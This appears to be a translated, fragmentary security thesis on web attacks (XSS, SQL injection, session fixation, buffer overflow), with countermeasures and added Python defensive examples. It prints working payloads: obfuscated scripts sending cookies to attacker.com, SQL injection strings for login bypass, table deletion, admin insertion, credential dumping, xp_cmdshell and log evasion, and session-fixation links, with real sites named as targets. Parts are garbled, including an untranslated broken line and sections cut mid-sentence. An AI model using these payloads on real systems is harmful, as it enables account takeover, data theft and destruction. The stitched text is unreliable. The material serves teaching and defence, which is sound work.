Once the user clicks the link "An attractive prize is waiting for you", the cookie on the victim's machine is stolen and passed as a parameter to the hacker's steal.cgi program:
http://www.attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C20100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_titan_20=5901=1019511286
The problem is that the programmer may protect the Web application by filtering special characters such as quotes or +, for instance to prevent a quote from being used to run an SQL query. But the hacker can use hex codes in place of the special characters, substituting the hex number for each ASCII character. Example 5.II-2:
http://www.attacker.com/steal.cgi:
  h -> 0x0068
  t -> 0x0074
  t -> 0x0074
  p -> 0x0070
  : -> 0x003A
  / -> 0x002F
Below is an example of using hex codes in a web application. Example 5.II-3:
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a href="http://hotwired.lycos.com/webmonkey/index1.html?tw=<script>var u = String.fromCharCode(0x0068);
u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0070); u %2B= String.fromCharCode(0x003A);
u %2B= String.fromCharCode(0x002F); u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0061); u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x0065); u %2B= String.fromCharCode(0x0072);
u %2B= String.fromCharCode(0x002E); u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006F); u %2B= String.fromCharCode(0x006D);
u %2B= String.fromCharCode(0x002F); u %2B= String.fromCharCode(0x0073);
u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0065);
u %2B= String.fromCharCode(0x0061); u %2B= String.fromCharCode(0x006C);
u %2B= String.fromCharCode(0x002E); u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x0067); u %2B= String.fromCharCode(0x0069);
u %2B= String.fromCharCode(0x003F);
u %2B=document.cookie;document.location.replace(u);</script>"
   onMouseOver="window.status='http://www.hotwired.lycos.com/index2.html';return true"
   onMouseOut="window.status='';return true">An attractive prize is waiting for you</a>
</body>
</html>
Sites listed in section III (table residue; only the names and addresses survived):
  nbc.com
  Microsoft
  Chase - https://www.chase.com/
  EBay
  Oracle Japan - http://www.oracle.co.jp/
Macromedia Flash can be programmed in a scripting language built into Flash, ActionScript. ActionScript has a simple syntax similar to that of JavaScript, C or PERL. For example, the getURL() function is used to call another web page; its parameter is usually a URL such as http://www.yahoo.com. Example 5.IV-1:
getURL("http://www.yahoo.com")
Example 5.IV-1 above produces a message box containing the cookie of the web page that hosts the flash file. The site has thus been attacked by injecting a JavaScript snippet into the Web application through a flash file. A clearer example of this attack follows. This is the code inside the flash file, and it runs as soon as the flash file is loaded:
getURL("javascript:location('http://www.attacker.com?newcookie='+document.cookie)")
So as soon as a user views the page containing this flash file, the cookie that the page created for them is sent to the hacker.
Example 5.IV-2: DeviantArt is a well-known site that lets its members upload flash files for all other members to view. A hacker can therefore steal the cookies of its members, possibly including the web administrator's account, by registering as a member of this Web application, uploading a flash file to the server and waiting for victims to view it. Below is the link to a flash file of the kind presented in example 5.IV-2:
http://www.deviantart.com/deviation/1386080
Sites that let members post HTML data, such as forums or custom-signature features, can also be targets of this attack, by entering code that loads the flash file:
<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
        codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"
        WIDTH="60" HEIGHT="48" id="1" ALIGN="">
  <PARAM NAME=movie VALUE="http://www.ke_tan_cong.com/vidu.swf">
  <PARAM NAME=quality VALUE=high>
  <PARAM NAME=bgcolor VALUE=#FF9900>
  <EMBED src="http://www.ke_tan_cong.com/vidu.swf" quality=high bgcolor=#FF9900
         WIDTH="60" HEIGHT="48" NAME="1" ALIGN=""
         TYPE="application/x-shockwave-flash"
         PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
  </EMBED>
</OBJECT>
o Remove the characters > and <
o Still allow special characters to be entered, but encode them according to a fixed standard.
On the user's side, the browser should be reconfigured to prompt the user whether scripts may run on their machine; the user then decides according to how far they trust the site.
Remarks:
The XSS technique is quite common and easy to apply, but the damage is limited to attacks on the victim's machine through the deceptive links or forms the hacker sends to the victim. So, besides the application validating data before using it, the most important thing is for users to be wary before entering an unfamiliar Web site. One can say that user vigilance alone achieves 90% of the protection against this technique. In chapter 6, however, the attack is aimed at the server, in order to harvest information from the database and even gain administrative rights over the application.
Chapter 6
Convention: the programming language used for the illustrations in this chapter is ASP, with SQL Server as the database.
on m trn kim tra chui nhp Username v Password. Nu tn ti trong bng User th check=true ngc li check=false. Gi tri nhp vo l:
Username: OR = Password: OR =
The comparison above is always true (because '' always equals ''), so the condition in the WHERE clause is always true, and the user name of the first row in the table is selected. This can be combined with SQL's special characters: the character ; marks the end of one query, and the characters -- hide (comment out) the rest of the line after them. Example 6.III.1-2:
Username: '; drop table User--
Password:
With the statement above the User table is deleted completely. Example 6.III.1-3: Another example of using SQL special characters to break into the system:
Username: admin'--
Password:
The statement above logs in to the system with admin rights without requiring a password.
The Quote Injection concept: cases where the application places the entered argument between two single quotes or two double quotes are Quote Injection cases. Example 6.III.2-2:
StrSQL="SELECT tkUsername FROM User WHERE tkUsername='" & tName & "'"
To neutralise the quotes and alter the statement while still keeping the syntax valid, the injected string must have a single quote before the inserted characters, and the end of the statement must have a single quote, for example:
StrSQL="SELECT tkUsername FROM User WHERE tkUsername='' and ''=''"
If, after doing this, the error message mentions the character ( then the injected string must contain ). Example 6.III.2-3: Suppose:
StrSQL="SELECT tkUsername FROM User WHERE (tkUsername='" & tName & "')"
Then valid syntax is as follows:
StrSQL="SELECT tkUsername FROM User WHERE (tkUsername='') or (''='')"
The % character is also often used in information-search cases. Example 6.III.2-4:
StrSQL="SELECT tkUsername FROM User WHERE tkUsername like '%" & tName & "%'"
The statement above returns a result set combining tkUsername with tkPassword from the User table. Note: the number of columns in the two SELECT statements must match; that is, the original SELECT and the UNION SELECT appended after it must have the same number of columns, of the same types. Thanks to the syntax error returned after the UNION statement is appended, the type of each field can be learned.
Following are examples carried out when the contents of the database are unknown, relying on HAVING, GROUP BY and UNION. Example 6.III.4-2: Recall the login query:
SQLQuery="SELECT tkUsername,tkPassword FROM User WHERE tkUsername='" & strUsername & "' AND Password='" & tkPassword & "'"
First, to learn the table and field names the query uses, use a HAVING clause, as in the following example. Value entered:
Username: ' having 1=1--
Resulting error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkUsername' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
From this error we learn that the table used in the query is User and that it contains a field named tkUsername. Next, use GROUP BY. Example 6.III.4-3:
Username: ' group by User.tkUsername having 1=1--
Resulting error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkPassword' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
So tkPassword is a field of the User table and is used in the query. Continue with GROUP BY until every field of the User table that takes part in the query is known. When GROUP BY no longer produces a syntax error, move on to checking the type of each field in the table. At this point UNION is used. Example 6.III.4-4:
Username: ' union select sum(tkUsername) from User--
sum computes the total of the argument inside the parentheses; the argument must be numeric. If it is not numeric, the following error results:
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or [...] an argument.
With the method above, the type of each field in the table is easily determined. After gathering all the information above, the hacker can easily add data to the User table. Example 6.III.4-5:
Username: '; insert into User(tkUsername,tkPassword) values ('admin', '')--
Having added the content as in example 6.III.4.2.4, the hacker has now become the administrator without needing an authenticated password. Example 6.III.4-6 illustrates a procedure that lets the hacker read all the information in the User table. Step 1: Create a stored procedure that copies all the data of the two fields tkUsername and tkPassword of the User table into one string, stored in a new table foo with a single field ret, with the following code:
create proc test as
begin
    declare @ret varchar(8000)
    set @ret=':'
    select @ret=@ret+' '+tkUsername+'/'+tkPassword from User
    select @ret as ret into foo
end
Step 2: Call the stored procedure. Once the stored procedure above has been created, call it:
Username: ';exec test
Resulting error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': [...]
After a few steps, the hacker obtains the contents of the User table, including the tkUsername names and tkPassword passwords. Step 4: The hacker can also carefully drop the foo table to erase traces:
Username: '; drop table foo--
Example 6.III.4-7: Here is another way to determine the contents of the User table, using a search method as follows: Step 1: Walk the rows of the User table one at a time:
Username: ' union select 1,1
or:
Username: ' union select min(tkUsername),1 from User where tkUsername > 'a'--
Resulting error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.
The first user in the User table is admin. Step 2: To learn the following values, enter the string:
Username: ';select min(tkUsername),1 from User where tkUsername > 'admin' union select 1,1 from User
Resulting error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'nhimmap' to a column of data type int.
Step 3: Proceed as in step 2 until results have been obtained for each row of the tkUsername field in the User table.
Resulting error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'passOfAdmin' to a column of data type int.
To learn about the tables and columns in the database, the system table INFORMATION_SCHEMA.TABLES can be queried. Example 6.III.4-8:
select TABLE_NAME from INFORMATION_SCHEMA.TABLES
INFORMATION_SCHEMA.TABLES holds information about every table on the server. The TABLE_NAME field holds the name of each table in the database.
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='User'
The statement above is used to learn about the columns in a table. UNION can also be used to learn SQL Server's environment variables.
Example 6.III.4-9: To learn which server the application is running on, it can be determined as follows:
Username: ';select @@SERVERNAME union select 1
Resulting error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'KHOAI_NGU' to a column of data type int.
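The error messages above are what makes this enumeration work, so a defender wants to see the probing in the web server's logs before the database answers. The following added Python example (not from the thesis) runs a handful of rules over constructed W3C-style log lines; the log format, IP addresses, timestamps and rule names are all assumptions for the illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines, simplified W3C extended format:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2011-06-03 08:04:01 10.0.0.5 GET /login.asp username=alice&password=s3cret 302
2011-06-03 08:04:07 10.0.0.9 GET /login.asp username=%27+having+1%3D1-- 500
2011-06-03 08:04:09 10.0.0.9 GET /login.asp username=%27+group+by+User.tkUsername+having+1%3D1-- 500
2011-06-03 08:04:15 10.0.0.9 GET /login.asp username=%27+union+select+sum(tkUsername)+from+User-- 500
2011-06-03 08:04:21 10.0.0.9 GET /login.asp username=%27%3Bselect+%40%40SERVERNAME+union+select+1 500
2011-06-03 08:05:02 10.0.0.7 GET /search.asp q=o%27brien 200
"""

# One rule per enumeration stage described above; the names are our own labels.
RULES = [
    ("having-probe",      re.compile(r"'\s*having\b", re.I)),
    ("group-by-probe",    re.compile(r"\bgroup\s+by\b.*\bhaving\b", re.I)),
    ("union-type-probe",  re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("server-variable",   re.compile(r"@@\w+")),
    ("schema-lookup",     re.compile(r"information_schema\.", re.I)),
    ("stacked-statement", re.compile(r";\s*(exec|insert|drop|select)\b", re.I)),
]


def decoded_values(query: str) -> str:
    """parse_qs undoes percent-encoding and '+', so the rules see the same
    text SQL Server would have received."""
    params = parse_qs(query, keep_blank_values=True)
    return " ".join(v for values in params.values() for v in values)


def classify(line: str):
    """Return (client_ip, status, matched rule names) for one log line."""
    _date, _time, ip, _method, _stem, query, status = line.split(" ", 6)
    text = decoded_values(query)
    hits = [name for name, rx in RULES if rx.search(text)]
    return ip, int(status), hits


def suspicious_clients(log_text: str, min_stages: int = 2) -> dict:
    """Aggregate per client. One odd request is noise; a client that walks
    through several stages, or whose probes produce HTTP 500s (the SQL
    error page leaking back), is what an analyst wants to see."""
    per_ip = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ip, status, hits = classify(line)
        if not hits:
            continue
        entry = per_ip.setdefault(ip, {"stages": set(), "errors": 0})
        entry["stages"].update(hits)
        if status >= 500:
            entry["errors"] += 1
    return {ip: e for ip, e in per_ip.items()
            if len(e["stages"]) >= min_stages or e["errors"] > 0}


if __name__ == "__main__":
    for ip, info in suspicious_clients(SAMPLE_LOG).items():
        print(ip, sorted(info["stages"]), "errors:", info["errors"])
```

The legitimate O'Brien search is not flagged because a lone apostrophe matches none of the rules; what stands out is one client moving through the HAVING, GROUP BY, UNION and @@ stages in sequence while collecting server errors, which is the pattern of the walk-through above.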
Clearly, it prevents all the kinds of attack above. However, if one wants to create a string value without using quotes, the char() function can be used, as in the following example. Example 6.III.7.1-2:
INSERT into User VALUES(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 255)
Example 6.III.7.1-3 above, although a query without any single quote, can still insert strings into the table, and is equivalent to:
INSERT into User VALUES(666,'chris','chris',255)
(but the database stores it as admin'--). Suppose the application lets users change their password. The ASP code is designed to make sure the user enters the correct old password before entering a new one. The code is as follows:
username = escape( Request.form("username") );
oldpassword = escape( Request.form("oldpassword") );
newpassword = escape( Request.form("newpassword") );
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";
rso.open( sql, cn );
if (rso.EOF)
{
The query that sets the new password is as follows:
// rso("username") is the value read back from the database, not the escaped form input
sql = "update users set password = '" + newpassword + "' where username= '" + rso("username") + "'"
update users set password = 'password' where username = 'admin'--'
So the hacker can change the admin's password to a value of their own. This is a case that still exists in most large applications today that use a character-stripping mechanism. The best solution is to reject offending values rather than to fix them up. But a problem is that some inputs (such as names) must allow these characters, for example O'Brien. The best way to solve this is to disallow single quotes; if that is not possible, strip and replace as above. In that case, the best approach is to ensure that all data put into the SQL query (including values already in the database) is tightly controlled.
Some applications guard against users injecting queries by limiting the length of the input. However, while this limit makes some kinds of attack impossible, it still leaves openings for the hacker. Example 6.III.7.2-2: Suppose both username and password are limited to at most 16 characters. Enter:
Username: aaaaaaaaaaaaaaa'
Password: '; shutdown--
The application replaces one single quote with two, but because the string length is limited to 16 characters, the single quote just added is cut off. The SQL statement becomes:
select * from users where username='aaaaaaaaaaaaaaa'' and password='''; shutdown--
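The escape-then-truncate failure above is easy to reproduce. This added Python example (not the thesis's ASP code) models the two possible orders of the operations on the page's own inputs and checks which order lets a second statement appear outside the string literals; the 16-character limit comes from the example, while the table and helper names are assumptions.

```python
import sqlite3

MAX_LEN = 16   # column length limit used in the example above


def escape_quotes(value: str) -> str:
    """The 'escaping' the thesis describes: double every single quote."""
    return value.replace("'", "''")


def escape_then_truncate(value: str) -> str:
    """Vulnerable order: escape first, then cut to the column length. A
    doubled quote straddling the cut leaves a lone quote behind."""
    return escape_quotes(value)[:MAX_LEN]


def truncate_then_escape(value: str) -> str:
    """Safe order: enforce the length limit on the raw input, then escape,
    so the escaped value can never end in an unbalanced quote."""
    return escape_quotes(value[:MAX_LEN])


def build_login_sql(username: str, password: str) -> str:
    return ("select * from users where username='" + username
            + "' and password='" + password + "'")


def statements_outside_literals(sql: str) -> int:
    """Count ';' characters outside string literals, i.e. statement breaks
    that were smuggled in ('' inside a literal is one escaped quote)."""
    count, in_literal, i = 0, False, 0
    while i < len(sql):
        ch = sql[i]
        if ch == "'":
            if in_literal and sql[i + 1:i + 2] == "'":
                i += 2                      # escaped quote, stay in literal
                continue
            in_literal = not in_literal
        elif ch == ";" and not in_literal:
            count += 1
        i += 1
    return count


def run_against_sqlite(sql: str) -> str:
    """Execute against an empty in-memory users table. sqlite3 refuses a
    string that holds more than one statement, which is exactly what the
    vulnerable order produces here."""
    con = sqlite3.connect(":memory:")
    try:
        con.execute("create table users(username text, password text)")
        rows = con.execute(sql).fetchall()
        return "rows:%d" % len(rows)
    except (sqlite3.Warning, sqlite3.Error) as exc:
        return "rejected: " + str(exc)
    finally:
        con.close()


# Inputs from the example above (constructed here): 15 'a' plus a quote,
# and a password that tries to start a second statement.
ATTACK_USER = "a" * 15 + "'"
ATTACK_PASS = "'; shutdown--"


def compare_orders():
    vulnerable = build_login_sql(escape_then_truncate(ATTACK_USER),
                                 escape_then_truncate(ATTACK_PASS))
    safe = build_login_sql(truncate_then_escape(ATTACK_USER),
                           truncate_then_escape(ATTACK_PASS))
    return {
        "vulnerable_sql": vulnerable,
        "vulnerable_breaks": statements_outside_literals(vulnerable),
        "safe_sql": safe,
        "safe_breaks": statements_outside_literals(safe),
    }


if __name__ == "__main__":
    result = compare_orders()
    for key, value in result.items():
        print(f"{key}: {value}")
    print("sqlite on vulnerable:", run_against_sqlite(result["vulnerable_sql"]))
    print("sqlite on safe:      ", run_against_sqlite(result["safe_sql"]))
```

With escape-then-truncate the username literal swallows " and password='" and the ; lands outside any literal, so a second statement exists; with truncate-then-escape the same inputs produce one harmless statement that simply matches no user.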
...even when sp_password appears in a comment. So, to hide every attack query, simply add sp_password after the -- as follows:
Username: admin'--sp_password
III.7.4. Using Extended Stored Procedures
III.7.4.1. Using the extended stored procedures built into SQL Server
If SQL Server is installed with default settings, it runs as SYSTEM, which is equivalent to full Windows access. master..xp_cmdshell can be used to run commands remotely:
; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try double quotes (") if single quotes (') do not work. Below are some extended stored procedures hackers commonly use to run commands that reveal information on the victim machine:
o displays the drives present on the machine
o displays all directories, including subdirectories
o retrieves information about the security mode on the server
o lets the user create archive files stored on the server (or any file the server can access
Xp_ntsec_enumdomain lists the domains the server can query. Xp_terminate_process terminates a process given its PID as a parameter.
It can then be executed like any ordinary extended stored procedure:
exec xp_webserver
Then run the bulk insert statement to copy the data from the file into the table. Example 6.III.7.4.3-2:
bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'
The contents of the page process_login.asp can then be retrieved with the techniques in Example 6.III.7.4-3.
o data entered by the user
o parameters from the URL
o values from cookies
For numeric values, convert them to integer before executing the SQL query, or use ISNUMERIC to be sure the value is an integer. Use a data encryption algorithm.
Second, there is the problem of two-stage attacks (second-order SQL injection) when data is taken back out of the system. Solution 2 is defeated in the same cases as solution 1, because invalid data keeps changing as new kinds of attack develop. Solution 3 is better than the other two but has some limitations in implementation. The best protection is to combine solutions 2 and 3. An example of the need to combine 2 and 3: the hyphen between the surnames in Quentin Bassington-Bassington must be allowed by the definition of valid data, yet the character sequence -- is special in SQL Server. For instance, if the filter removes invalid data such as --, select and union, and a sanitising function removes single quotes, it can be countered as follows:
union select @@version--
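Solution 3 in practice means keeping data out of the SQL text altogether. The added Python example below (not the thesis's ASP code) puts the chapter's login query into SQLite twice, once built by string concatenation as on the page and once with bound parameters, and adds the kind of allowlist check solution 2 describes; the sample users, including Quentin Bassington-Bassington and O'Brien from the text, are constructed.

```python
import re
import sqlite3

# Allowlist in the spirit of solution 2: letters, spaces, apostrophes and
# single hyphens, so O'Brien and Bassington-Bassington pass. Note that it
# does NOT stop admin'-- ; validation alone is not the defence.
USERNAME_OK = re.compile(r"^[A-Za-z][A-Za-z' -]{0,63}$")


def username_looks_valid(username: str) -> bool:
    return USERNAME_OK.match(username) is not None


def make_db() -> sqlite3.Connection:
    """Constructed User table mirroring the column names in the chapter."""
    con = sqlite3.connect(":memory:")
    con.execute("create table User(tkUsername text, tkPassword text)")
    con.executemany("insert into User values (?, ?)", [
        ("admin", "passOfAdmin"),
        ("O'Brien", "pw1"),
        ("Quentin Bassington-Bassington", "pw2"),
    ])
    return con


def login_concat(con, username: str, password: str):
    """Vulnerable: the page's query built by concatenation (ASP '&' -> '+').
    Returns the matched user, None, or the database error text."""
    sql = ("SELECT tkUsername FROM User WHERE tkUsername='" + username
           + "' AND tkPassword='" + password + "'")
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "error: " + str(exc)       # the leak the chapter relies on
    return row[0] if row else None


def login_param(con, username: str, password: str):
    """Fixed: bound parameters. The values travel separately from the SQL
    text, so quotes, -- and ; inside them are data, never syntax."""
    row = con.execute(
        "SELECT tkUsername FROM User WHERE tkUsername=? AND tkPassword=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    con = make_db()
    cases = [("' OR ''='", "' OR ''='"), ("admin'--", ""), ("O'Brien", "pw1"),
             ("Quentin Bassington-Bassington", "pw2")]
    return [(u, username_looks_valid(u), login_concat(con, u, p), login_param(con, u, p))
            for u, p in cases]


if __name__ == "__main__":
    for username, valid, concat, param in demo():
        print(f"{username!r:35} allowlist={valid!s:5} concat={concat!r} param={param!r}")
```

The concatenated query lets both of the chapter's payloads log in as admin and throws a syntax error on the genuine O'Brien; the parameterised query rejects the payloads (admin'-- even passes the allowlist) and accepts the apostrophe and hyphen as ordinary characters, which is why the two measures are combined rather than chosen between.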
Check the server's patch level
o Some attacks, such as buffer overflows and format strings, target this layer of protection.
Check the sessions on the server.
Change "Startup and run SQL Server" to a low-privilege user account in SQL Server Security.
Remarks:
This chapter 6 also shows that validating data before processing it is necessary. Besides validating its data, the application should encrypt data inside the database itself and should not emit error pages reporting SQL syntax errors, so that hackers cannot gather information about the database. In parallel there is the work of the network administrator.
Chapter 7
Step 2: Send this ID to the victim's browser. The hacker sends the newly created session ID to the user; how the session ID is exchanged depends on the application and can be via the URL, a hidden form field or a cookie. Common attacks include:
o Attacking the session ID in a URL parameter.
o Attacking the session ID in a hidden form field.
o Attacking the session ID in a cookie.
Step 3: Break into the victim's session. Once the victim has logged in through the pre-set session ID and has not yet left the application, the hacker uses that session ID to step into the victim's session.
Figure 7.II-2: Detailed description of the process of attacking a user with the session fixation technique.
1. The hacker opens the bank's online service at the address online.worldbank.com.
2. Receives a session ID from the server identifying the hacker's session; for example, the session ID has the value 1234.
3. The hacker then finds a way to send a link to some user who has an account at this bank. Such links usually lead to the bank's account login page, for example http://online.workbank.com/login.jsp?sessionid=1234, tricking the user into working inside the hacker's session. When the user receives this link,
4. The user falls for it and opens the web application through the hacker's link. Since a session ID (the hacker's) already exists, the server does not create a new one.
5. The user then logs in with his own credentials to manage his account.
6. The hacker now enters the user's account without having to log in, since they share the same session.
Remarks: This attack requires the application to create a session ID as soon as the user begins using the application. It is easily detected by the user.
Specifically:
a) Setting a cookie in the browser with a scripting language: most browsers support client-side scripting languages such as JavaScript and VBScript. Both can set a browser cookie by assigning the value of document.cookie. Example 7.II.3-1:
http://online.workbank.com/<script>document.cookie="sessionid=1234; domain=.workbank.com";</script>.idc
In addition, the hacker can set the cookie's lifetime and domain, which suits systems built around freedom: for example, any domain under .workbank.com can read this cookie value.
b) Using the <META> tag with the Set-Cookie attribute: the application can also set a browser cookie with the <META> tag in HTML. Example 7.II.3-2:
<meta http-equiv="Set-Cookie" content="sessionid=1234">
Meta tag injection: on systems that check arguments for the <SCRIPT> tag, the XSS technique runs into difficulty, so injecting a <META> tag is a fairly effective method that allows manipulating cookies. Normally the <META> tag is placed between the
This method has an advantage over XSS in that it is not defeated in IE (when client-side scripting languages are disabled), except for the <META REFRESH> tag.
c) Setting a cookie with the Set-Cookie attribute in the HTTP response header: this method sets a browser cookie by using Set-Cookie in the HTTP header, via a DNS server attack technique,
...of the user at login, and always create a new session ID when the user logs in successfully.
Measure 2: Guard against hackers outside the system. Building the application restrictively (only creating a new session ID for a user after they have logged in successfully) means hackers who are not legitimate users of the system cannot use this attack method.
Measure 3: Limit the scope in which the session ID can be used
o Tie the session ID to the browser's address.
o Tie the session ID to the user's SSL-encrypted authentication information.
o Destroy the session when the user logs out or when it expires; this can be done on the server or in the browser (cookie).
o Users must use the logout feature to destroy the current session, and possibly session IDs still stored on the system from earlier times when they forgot to log out.
o Set an expiry time for sessions, to prevent the hacker from keeping a session alive and using it for a long time.
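The three measures above fit in a few dozen lines of server-side logic. The following added Python example (not code from the thesis) is a toy session store that issues a fresh ID at login regardless of what the browser presented, binds the ID to the client with an HMAC, and expires it; it then replays the bank walk-through with the attacker's 1234. The class, the secret and the addresses are all constructed for the illustration.

```python
import hashlib
import hmac
import secrets
import time


class SessionStore:
    """Toy server-side session store (constructed for this example)."""

    def __init__(self, secret: bytes, ttl_seconds: int = 900):
        self._secret = secret
        self._ttl = ttl_seconds
        self._sessions = {}      # session id -> {"user", "fp", "created"}

    def _fingerprint(self, client_ip: str, user_agent: str) -> str:
        # Measure 3: bind the session to the client. Keyed with the server
        # secret so the binding cannot be forged from the visible inputs.
        msg = f"{client_ip}|{user_agent}".encode()
        return hmac.new(self._secret, msg, hashlib.sha256).hexdigest()

    def login(self, presented_id, username, password_ok, client_ip, user_agent, now=None):
        """Measure 1: a successful login always gets a brand-new random ID.
        Whatever the browser presented (e.g. the attacker's 1234 from the
        URL) is discarded, so an ID fixed before login never becomes a
        logged-in session."""
        if not password_ok:
            return None
        now = time.time() if now is None else now
        self._sessions.pop(presented_id, None)      # never upgrade a pre-login ID
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": username,
                               "fp": self._fingerprint(client_ip, user_agent),
                               "created": now}
        return sid

    def user_for(self, sid, client_ip, user_agent, now=None):
        """Resolve a session. Unknown or attacker-chosen IDs, IDs presented
        from a different client, and expired IDs all resolve to None."""
        now = time.time() if now is None else now
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if now - entry["created"] > self._ttl:          # Measure 3: expiry
            del self._sessions[sid]
            return None
        if not hmac.compare_digest(entry["fp"], self._fingerprint(client_ip, user_agent)):
            return None
        return entry["user"]

    def logout(self, sid):
        self._sessions.pop(sid, None)


def fixation_walkthrough():
    """Replay the online.workbank.com scenario against this store.
    Returns (new id issued?, what the attacker sees with 1234,
    what the attacker sees with the real id, victim's own view, view after expiry)."""
    store = SessionStore(secret=b"constructed-demo-secret", ttl_seconds=900)
    victim_ip, victim_ua = "203.0.113.10", "Mozilla/5.0 (victim)"
    attacker_ip, attacker_ua = "198.51.100.7", "Mozilla/5.0 (attacker)"

    # Steps 4 and 5 of the walk-through: victim arrives with ?sessionid=1234 and logs in.
    real_sid = store.login("1234", "victim", True, victim_ip, victim_ua, now=1000.0)
    # Step 6: the attacker tries the fixed ID, and even the real ID from elsewhere.
    via_fixed = store.user_for("1234", attacker_ip, attacker_ua, now=1001.0)
    via_real = store.user_for(real_sid, attacker_ip, attacker_ua, now=1001.0)
    victim_view = store.user_for(real_sid, victim_ip, victim_ua, now=1001.0)
    after_expiry = store.user_for(real_sid, victim_ip, victim_ua, now=1000.0 + 901)
    return real_sid != "1234", via_fixed, via_real, victim_view, after_expiry


if __name__ == "__main__":
    print(fixation_walkthrough())
```

Regenerating the ID at login is what defeats the fixation itself; the client binding and expiry are the page's third measure and limit the damage if an ID leaks after login by some other route.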
III.1. The difference between session hijacking and session fixation
Session hijacking compared with session fixation
Attack direction
- Hijacking: attacks the victim's browser after the victim has logged in.
- Fixation: attacks the victim's browser before the victim logs in.
Impact
- Hijacking: gains access once.
- Fixation: the hacker gains access once, temporarily, or for a long time, each time the victim's session is attacked.
Keeping the session alive
- Hijacking: no need to keep the session alive.
- Fixation: may need to keep the session alive until the victim logs in.
Attack vectors
- Hijacking: 1. Exploit an XSS flaw on the server. 2. Capture the session ID in the HTTP Referer header sent to another web server. 3. Exploit network traffic (where links to the server are not encrypted).
- Fixation: 1. Make the user log in to the system through a link or a modified form. 2. Exploit an XSS flaw on any server in the victim's domain. 3. Exploit a flaw via the <META> tag on any server in the victim's domain. 4. Add a server able to generate session IDs in the same domain as the target server into the victim's DNS server. 5. Alter network traffic.
Targets
- Hijacking: the server; the communication link.
- Fixation: all servers on the target domain; the DNS server; the server; the communication link.
Remarks:
This attack technique exploits laxity in the application's session management while also targeting users who are careless when accessing a web application. Of all the chapters covered, only the XSS and session-management techniques take advantage of the user's lack of caution.
Chapter 8
BUFFER OVERFLOW
Contents:
I. Concept
II. Memory organisation
III. Some ways to cause a buffer overflow through a web application
IV. Countermeasures
I. CONCEPT
Buffer overflow had been a hole in UNIX security for many years but was only made public after Dr. Mudge's discussion in the 1995 document "How to write a Buffer Overflow exploit"(1). With the buffer overflow technique, a large amount of user-supplied data that exceeds the memory initially allocated by the application causes the system to overflow its memory, and an arbitrary piece of code may even be injected. If the application is configured to run as root, the attacker can act as the web server's system administrator. Most of these problems stem from the poor skill of programmers; a typical one is carelessness in checking the size of input data. Example 8.I-1:
#include <string.h>

void func(char *ch)
{
    char buffer[256];
    strcpy(buffer, ch);   /* no length check: input longer than the buffer overwrites the stack */
}
The buffer is allocated only 256 bytes, but if in func the buffer receives 257 characters from ch, a buffer overflow occurs.
The buffer overflow exploit technique is considered one of the most classic hacking techniques. Chapter 5 is divided into two parts. Part 1: Memory organisation, the stack, function calls, shellcode. It introduces the memory organisation of a process, the stack operations performed when a function is called, and the basic technique for building shellcode, code that launches a command-line interface (shell). Part 2: The buffer overflow exploitation technique. It introduces the basic overflow technique, the layout of the shellcode, determining the return address and the shellcode address, and passing the shellcode to the buggy program. The technical details illustrated here were carried out on Linux x86 (kernel 2.2.20, glibc-2.1.3), but in theory they apply to any other environment.
Every executing process is given by the operating system an identical virtual (logical) memory space. This space consists of three regions: text, data and stack. The meaning of the three regions is as follows:
The Text region is fixed and contains the executable instructions and read-only data. It is shared among processes executing the same program file and corresponds to the text segment of the executable file. Data in this region is read-only; any attempt to write to it causes a segmentation violation.
The Data region contains initialised and uninitialised data. Global and static variables are stored here.
